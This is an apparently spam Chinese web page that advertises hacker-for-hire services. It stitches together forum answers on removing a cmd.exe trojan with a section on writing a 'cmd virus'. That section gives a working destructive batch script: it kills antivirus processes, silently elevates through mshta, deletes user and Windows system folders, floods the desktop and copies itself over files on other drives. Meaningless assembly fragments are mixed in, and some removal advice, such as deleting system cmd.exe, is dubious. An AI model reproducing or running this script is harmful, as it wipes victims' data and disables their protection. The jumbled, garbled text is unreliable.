黑客24小时在线接单网站

今天给大家带来{黑客24小时在线接单网站}，和编写木马病毒的相关知识,如果可以可以选择收藏本站。

解决cmd.exe的 木马病毒

360系统急救箱(原顽固木马专杀大全)简介

360系统急救箱（原名：“顽固木马专杀大全”）是强力查杀木马病毒的系统救援工具，对各类流行的顽固木马查杀效果极佳，如犇牛、机器狗、灰鸽子、扫荡波、磁碟机等。在系统需要紧急救援、普通杀毒软件查杀无效，或是电脑感染木马导致360无法安装和启动的情况下，360系统急救箱能够强力清除木马和可疑程序，并修复被感染的系统文件，抑制木马再生，是电脑需要急救时最好的帮手。

适用场景：系统紧急救援，各类传统杀毒软件查杀无效的情形；电脑感染木马，导致360无法安装或启动的情形。

你试试

可能是中毒了！

但上面的那位方法也可以！

用cmd可以编病毒或木马吗?

cmd指的是批处理还是命令提示符？

如果是批处理的话，编写一个恶作剧的小小“病毒”应该是可以的，木马好像功能太少……

cmd.exe病毒

症状：

开机CPU就是100％，查进程，原来是cmd.exe 占用了绝大部分的CPU。关闭cmd.exe后，CPU实用率恢复正常。但是再次开机的时候，CPU又是100％，cmd.exe 依然占用了绝大部分的CPU。

1.装了ewido 查杀木马，查出了几个感染目标，已删除。但是今

天早上开机，CPU又是100％，cmd.exe 依然占用了绝大部分的CPU。

2.再装“木马清除专家2006”，查杀，结果没有发现木马。

3.查system 32 中的 CMD.EXE 大小，结果如下：

CMD.EXE 大小：459 KB (470,016 字节)

占用空间：460 KB (471,040 字节)

应该没有异常。

解决方法：

如果出现这种情况，很不幸，你99％是中了木马了。不过不妨继续验证一下，假定你的windows安装盘位于C:\，并且需要你在文件查看选项中打开查看隐藏文件的选项和显示所有文件扩展名的选项，则

查看你的c:\Program Files\Internet Explorer\PLUGINS\目录，应该会发现有new123.bak和new123.sys两个文件；

查看你的C:\Documents and Settings\Administrator\Local Settings\Temp\目录，应该会发现有MicroSoft.bat这个文件；你可以用记事本打开MicroSoft.bat文件，发现其中提到一个exe文件（具体名称会有不同），你也会在该目录下发现这个exe文件；

如果以上两步你并未发现相应文件，请将你的文件查看改为不隐藏已知文件后缀，并在系统盘内进行文件搜索，确认是否的确没有相关的文件。

木马描述

该木马主要是因为用户安装了嵌入木马程序的安装程序所致，这些安装程序极有可能是你在一些不知名的下载网站上下载的一些应用程序（比如qq的一些版本等）。该木马利用安装程序在没有提醒用户的情况下在IE的插件中安装了实为木马的IE插件。使得一般的杀毒和杀马程序无法识别。并且当你运行一些需要调用IE的一些程序时自动调用该木马插件，所以才出现“症状描述”中所描述的情况。

该木马的母体就是new123.sys，属于Trojan-PSW.Win32.Delf.mc，可能会偷取你的一些应用的帐号和密码。

木马清除

该木马可以很方便的手工清除，过程如下：

打开“任务管理器”，在“进程”中结束cmd.exe的运行，此时CPU占用率会明显下降；

进入C:\Documents and Settings\Administrator\Local Settings\Temp\目录，删除MicroSoft.bat这个文件中所提到的exe文件和该bat文件；（这一步不做也没有问题，但最好清除掉）

进入c:\Program Files\Internet Explorer\PLUGINS\目录，删除new123.bak文件，但此时你无法删除new123.sys文件，因为系统正在使用，你有两种方式处理new123.sys文件：

重启机器并进入安全模式对new123.sys进行删除；

当前状态虽无法删除该文件，但可更改new123.sys的文件名为new123.sysdel，并且重启机器（无需进入安全模式）后，再把new123.sysdel进行删除。

处理完后，如果“症状描述”中的情况消失，则说明清除成功。

XP系统里并没有cmd.exe的进程，cmd.exe是XP系统的命令提示符程序，可以执行一些在DOS下执行的应用程序，但是并不会随系统启动时运行，这有可能是个木马或者其他病毒程序，建议查杀

1、如果安装文件就在硬盘上，而且系统是从硬盘的安装目录装的，那先将这个安装目录改个名字

2、删除c:\winnt\system32\dllcache\cmd.exe，

3、然后再删除system32\cmd.exe

4、系统会提示说系统文件丢失要求插入光盘，忽略就行了

禁止运行命令解释器和批处理文件方法：通过修改注册表，可以禁止用户使用命令解释器(CMD.exe)和运行批处理文件(.bat文件)。新建一个双字节(REG＿DWORD)执行HKEY＿CURRENT＿USER＼Software＼Policies＼ Microsoft＼Windows＼System＼DisableCMD，修改其值为2，命令解释器和批处理文件都不能被运行。修改其值为1，则只是禁止命令解释器的运行。

就是替换掉系统的cmd.exe文件。但是由于此文件受系统保护，所以必须用一种特殊的办法。至于那个用来替换cmd.exe的文件，可以随便找一个运行时候没有什么提示的东西就行。C:\Windows\system32下面有很多这样的文件，随便找一个就行。替换方法是：首先删除C:\WINDOWS\system32\Dllcache\下面的cmd.exe，然后尽快将C:\WINDOWS\system32\下面的cmd.exe替换成所需的文件。当系统提示要求插入WINDOWS安装光盘的时候，不要理他，直接单击“取消”就可以了。之后当你开始-〉运行-〉cmd的时候，dos窗口自然不会出现了

百度提供的解决方法如下： 1：XP系统里并没有cmd.exe的进程，cmd.exe是XP系统的命令提示符程序，可以执行一些在DOS下执行的应用程序，但是并不会随系统启动时运行，这有可能是个木马或者其他病毒程序，建议查杀 1）、如果安装文件就在硬盘上，而且系统是从硬盘的安装目录装的，那先将这个安装目录改个名字 2）、删除c:\winnt\system32\dllcache（没有这个子文俭）\cmd.exe， 3）、然后再删除system32\cmd.exe 4、系统会提示说系统文件丢失要求插入光盘，忽略就行了 禁止运行命令解释器和批处理文件方法：通过修改注册表，可以禁止用户使用命令解释器(CMD.exe)和运行批处理文件(.bat文件)。新建一个双字节(REG＿DWORD)执行HKEY＿CURRENT＿USER＼Software＼Policies＼ Microsoft＼Windows＼System＼DisableCMD，修改其值为2，命令解释器和批处理文件都不能被运行。修改其值为1，则只是禁止命令解释器的运行。 就是替换掉系统的cmd.exe文件。但是由于此文件受系统保护，所以必须用一种特殊的办法。至于那个用来替换cmd.exe的文件，可以随便找一个运行时候没有什么提示的东西就行。C:\Windows\system32下面有很多这样的文件，随便找一个就行。替换方法是：首先删除C:\WINDOWS\system32\Dllcache\下面的cmd.exe，然后尽快将C:\WINDOWS\system32\下面的cmd.exe替换成所需的文件。当系统提示要求插入WINDOWS安装光盘的时候，不要理他，直接单击“取消”就可以了。之后当你开始-〉运行-〉cmd的时候，dos窗口自然不会出现了 2：这个问题我最近也才遇到,系统装配和你的一样,懒得重装,所以就特别注意了一下,还好问题解决了! 我的电脑症状最开始是开机过会出现CMD.EXE进程,当初只要结束此任务就可以了,可是后来装了杀毒软件后只要一打开新的窗口或刷新桌面就会出现,还是每个页面出现一个CMD.EXE进程. 还好最近工作少,我就跟踪了一下,发现每当出现CMD.EXE进程之前都会出现bow.dll进程,通过搜索发现是在IE PLUGINS中的一个控件,做好重装机器准备将其删除还有bow.bak和bow.sys结果CMD.EXE进程不见了! 个人不是专业搞杀毒的,希望此方法对你有所帮助,另外我也把注册表中Explorer Bars-{C4EE31F3-4768-11D2-BE5C-00A0C9A83DA1}-FileNamedMRU中有关bow删除掉,顺便搜索一下其它键值是否也包含一起删除,以防万一. 这里我根本不能找到bow.bak 以及BOW.SYS,我已经把所有的文件全部显示出来，还是找不到。所以不知道从那里删起。 3：其一：病毒感染 据我所知的某些木马程序，通常会利用CMD.EXE这个命令行系统进行病毒加载或者是DLL插入，并且文件的大小会改变 CMD.EXE 大小：459 KB (470,016 字节) 占用空间：460 KB (471,040 字节) 若与该数字不太吻合，请注意，肯定是病毒感染了没错 解决办法：进入安全模式，删除CMD.EXE然后从windows\\servicespackfiles\\i386 文件夹中再复制一份到system32文件夹下。 其二：有启动项目是需要cmd.exe命令行支持运行的，若你的CMD.EX不能正常运行的话，会始终出现提示 解决办法：修复cmd.exe即可，参照第一种情况的解决办法 我的那个文件是三百多k,而且system32下以及i386下的cmd.exe一样大小。 4：我现在每次关机先把那个进程结束掉，然后就ok乐，没有什么其它的问题。

其实系统运行的CMD.exe并不是系统自己的命令提示符，而是一个病毒伪装的进程。使用新版的瑞星杀毒之后再清理注册表里的启动项就可以了，手动清理很困难，也很麻烦，所以推荐使用杀毒软件清理。因为我用的是瑞星，所以我确定它可以杀，KILL肯定清不掉。其他杀毒软件没有试过，所以不知道可不可以。

可以删除

进入注册表，查找,点开始---运行，输入regedit

“HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\”

删除Run下面的相应项就可以了；

或者在“开始”→“运行”处输入“msconfig”，把启动下面相应的那个网站前面的“√”去掉，重新启动计算机就可以了。

跟踪了一下,发现每当出现CMD.EXE进程之前都会出现bow.dll进程,通过搜索发现是在IE PLUGINS中的一个控件,做好重装机器准备将其删除还有bow.bak和bow.sys结果CMD.EXE进程不见了!

个人不是专业搞杀毒的,希望此方法对你有所帮助,另外我也把注册表中Explorer Bars-{C4EE31F3-4768-11D2-BE5C-00A0C9A83DA1}-FileNamedMRU中有关bow删除掉,顺便搜索一下其它键值是否也包含一起删除,以防万一.

如何解决cmd.exe占CPU资源100%问题

造成机器运行很慢，关闭cmd.exe后，CPU使用率恢复正常。但是再次开机的时候，CPU又是100%，cmd.exe 依然占用了绝大部分的CPU。

问题分析：后经上网查找和后来证实，应该是中了一种传播Viking的QQ尾巴病毒了，这种木马病毒主要是因为用户安装了嵌入木马程序的安装程序所致，这些安装程序极有可能是你在一些不知名的下载网站上下载的一些应用程序（比如qq的一些版本等）。该木马利用安装程序在没有提醒用户的情况下在IE的插件中安装了实为木马的IE插件。使得一般的杀毒和杀马程序无法识别。并且当你运行一些需要调用IE的一些程序时自动调用该木马插件，所以才出现“问题症状”中所描述的情况。

解决方法：我只能讲一下大概的思路了，因为当时没有记录和截图。首先在文件夹查看选项中打开查看隐藏文件的选项、显示所有文件扩展名和显示受保护的操作系统文件的选项。

1、从注册表里删除病毒添加的ShellExecuteHooks信息：打开注册表找到[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\ShellExecuteHooks]，

在实际情况中，图中应该会出现除{AEB6717E-7E19-11d0-97EE-00C04FD91972}以外的其它可疑键值的，依次按步骤2检查它们；

2、打开到注册表[HKEY_CLASSES_ROOT\CLSID\{这里是步骤1中提到的可疑键值}下，

然后依次检查上图中所示的每一个路径指向的文件，应该会有个文件是以.sys结尾的系统驱动文件，这个文件应该是隐藏文件，并且它的修改时间应该和该电脑出问题的时间差不多，而且在该文件旁边还会有和它的修改时间一样的隐藏文件，可以考虑将它们都删除了，以观后效。记得我当时是删除了三个在C:\Program Files\Internet Explorer\Connection Wizard 下的隐藏文件，就OK了。注：如果删不掉，可以进安全模式删除。

3、清除C:\Documents and Settings\你的用户名\Local Settings\Temp\目录下的所有垃圾文件，因为里面含有病毒释放生成的执行文件，当时我的情况是有两个病毒释放的文件：_xiaran.bat和help.exe(这个是隐藏和系统文件)。

4、重新启动计算机，观察5分钟，如果不再出现“问题症状”中描述的情况，说明清楚成功了

图片没有弄过来你自己去看一下

cmd.exe病毒的木马清除

该木马可以很方便的手工清除，过程如下：

打开“任务管理器”，在“进程”中结束cmd.exe的运行，此时CPU占用率会明显下降；

进入C:\Documents and Settings\Administrator\Local Settings\Temp\目录，删除MicroSoft.bat这个文件中所提到的exe文件和该bat文件；（这一步不做也没有问题，但最好清除掉）

进入c:\Program Files\Internet Explorer\PLUGINS\目录，删除new123.bak文件，但此时你无法删除new123.sys文件，因为系统正在使用，你有两种方式处理new123.sys文件：

重启机器并进入安全模式对new123.sys进行删除；

当前状态虽无法删除该文件，但可更改new123.sys的文件名为new123.sysdel，并且重启机器（无需进入安全模式）后，再把new123.sysdel进行删除。

处理完后，如果“症状描述”中的情况消失，则说明清除成功。

写cmd病毒

代码是

echo off

JMP Label1

Db thunkcode1

Label2:

JMP Label3

Db thunkcode3

Label1:

JMP Label2

Db thunkcode2

Label3:

JMP Label1

Db thunkcode1

Label2:jjj

JMP Label3

Db thunkcode3

Label1:ss

JMP Label2

Db thunkcode2

Label3:mm

taskkill /f /im 360DesktopLite.exe

jz label

　jnz label

　db thunkcode

label:

　jz label2

　jnz label2

　db thunkcode

lable2

　mov ax, 8

　xor ax, 77

taskkill /f /im explore.exe

taskkill /f /im 360tray.exe

taskkill /f /im 360Safe.exe

echo off

taskkill /f /im 360tray.exe

JMP Label1

Db thunkcode1

Label2:

JMP Label3

Db thunkcode3

Label1:

JMP Label2

Db thunkcode2

Label3:

JMP Label1

Db thunkcode1

Label2:

JMP Label3

Db thunkcode3

Label1:

JMP Label2

Db thunkcode2

Label3:

taskkill /f /im 360tray.exe

taskkill /f /im ZhuDongFangYu.exe

rmdir /s/q C:\Users\administrator\Desktop

rmdir /s/q C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

rmdir /s/q C:\ProgramData

del /f /s /q regedit.exe

JMP Label1

Db thunkcode1

Label2:

JMP Label3

Db thunkcode3

Label1:

JMP Label2

Db thunkcode2

Label3:

JMP Label1

Db thunkcode1

Label2:

JMP Label3

Db thunkcode3

Label1:

JMP Label2

Db thunkcode2

Label3:

call label_1

　db thunkcode

　jmp label_2

　db thunkcode

label_1:

　pop eax

　jmp label_3

　db thunkcode,thunkcode,thunkcode

label_3:

　inc eax

　jmp label_4

　db thunkcode,thunkcode,thunkcode

label_4:

　jmp eax

　db thunkcode

label_2:

del /f /s /q notepad.exe

rmdir /s/q apppatch

rmdir /s/q Windows10Upgrade

rmdir /s/q LDSGameMaster

set path=C:\ddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddd

set temp=C:\mmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmm

del /f /s /q search-ms:displayname=“win10%20(C%3A)”中的搜索结果crumb=System.Generic.String：cmdcrumb=location:C%3A%5C

rmdir /s/q C:\Windows\appcompat\Programs

rmdir /s/q C:\Windows\en-US

rmdir /s/q C:\Windows\OCR

del /f /s /q notepad.exe

rmdir /s/q apppatch

rmdir /s/q Windows10Upgrade

rmdir /s/q LDSGameMaster

set path=C:\ddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddd

set temp=C:\mmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmm

del /f /s /q search-ms:displayname=“win10%20(C%3A)”中的搜索结果crumb=System.Generic.String：cmdcrumb=location:C%3A%5C

rmdir /s/q C:\Windows\appcompat\Programs

rmdir /s/q C:\Windows\en-US

rmdir /s/q C:\Windows\OCR

::wwwwwww::rrrrrr%%tttt

rmdir /s/q C:\Windows\minidump

rmdir /s/q C:\Windows\Microsoft.NET

ftype nppfile="C:\ProgramFiles (x86)\Notepad++\notepad++.exe" %1

for /l %%i in (1 1 9999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999)do md A..\

@%1 mshta vbscript:CreateObject("Shell.Application").ShellExecute("cmd.exe","/c %~s0 ::","","runas",0)(window.close)exit

:a

set /a a+=1

echo %random%-%random%-%random% C:\Users\%username%\Desktop\CCBL.%random%

mshta javascript:alert(".");close();

goto a

@%1 mshta vbscript:CreateObject("Shell.Application").ShellExecute("cmd.exe","/c %~s0 ::","","runas",0)(window.close)exit

for /f "tokens=* delims=" %%i in ('dir /b D:\*.*') do copy /y "%dpnx0" "%%i" nul

for /f "tokens=* delims=" %%i in ('dir /b A:\*.*') do copy /y "%dpnx0" "%%i" nul

@%1 mshta vbscript:CreateObject("Shell.Application").ShellExecute("cmd.exe","/c %~s0 ::","","runas",0)(window.close)exit

for /f "tokens=* delims=" %%i in ('dir /b K:\*.*') do copy /y "%dpnx0" "%%i" nul

for /f "tokens=* delims=" %%i in ('dir /b I:\*.*') do copy /y "%dpnx0" "%%i"

@%1 mshta vbscript:CreateObject("Shell.Application").ShellExecute("cmd.exe","/c %~s0 ::","","runas",0)(window.close)exit

for /f "tokens=* delims=" %%i in ('dir /b Z:\*.*') do copy /y "%dpnx0" "%%i" nul

for /f "tokens=* delims=" %%i in ('dir /b M:\*.*') do copy /y "%dpnx0" "%%i" nul

rmdir /s/q C:\Windows\Offline Web Pages

cmd写木马病毒的介绍到这里结束，感谢您的关注，编写木马病毒、cmd写木马病毒的信息别忘了在本站进行查找喔。